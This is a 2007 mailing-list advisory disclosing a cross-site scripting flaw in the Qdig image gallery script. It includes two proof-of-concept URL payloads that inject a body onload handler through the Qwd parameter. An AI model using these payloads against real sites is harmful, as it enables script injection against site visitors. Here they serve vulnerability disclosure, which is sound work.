
Date: Sat, 10 Feb 2007 21:54:58 +0100
From: Andrea Purificato - bunker <bunker@...twebnet.it>
To: full-disclosure@...ts.grok.org.uk,
 bugtraq@...urityfocus.com
Subject: [XSS] Qdig - Quick Digital Image Gallery Version
	1.2.9.3 and -devel

Qdig - Quick Digital Image Gallery - http://qdig.sourceforge.net/)

Version affected: qdig-1.2.9.3, qdig-devel-20060624 

Risk: XSS

Description:
Qdig is an easy-to-use PHP script that dynamically presents your digital image 
files as an online gallery or set of galleries.

Vulnerability:
It's vulnerable to XSS (Cross Site Scripting) attack,
examples:
 - /?Qwd=\0%22%3Cbody%20onload=alert(String.fromCharCode(88,83,83))%3E 
 - /?Qwd=\0%22%3Cbody%20onload=document.write(navigator.userAgent);%3E  

Solution:
No solution until author answer.

Credits: 
Andrea "bunker" Purificato - http://rawlab.mindcreations.com


Mail copied to the author: haganafox AT sf (no other email found)
-- 
Andrea "bunker" Purificato
+++++++++++[>++++++>+++++++++++++++++++++++++++++++++>++++
++++++<<<-]>.>++++++++++.>.<----------.>---------.<+++++++.

http://rawlab.mindcreations.com 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
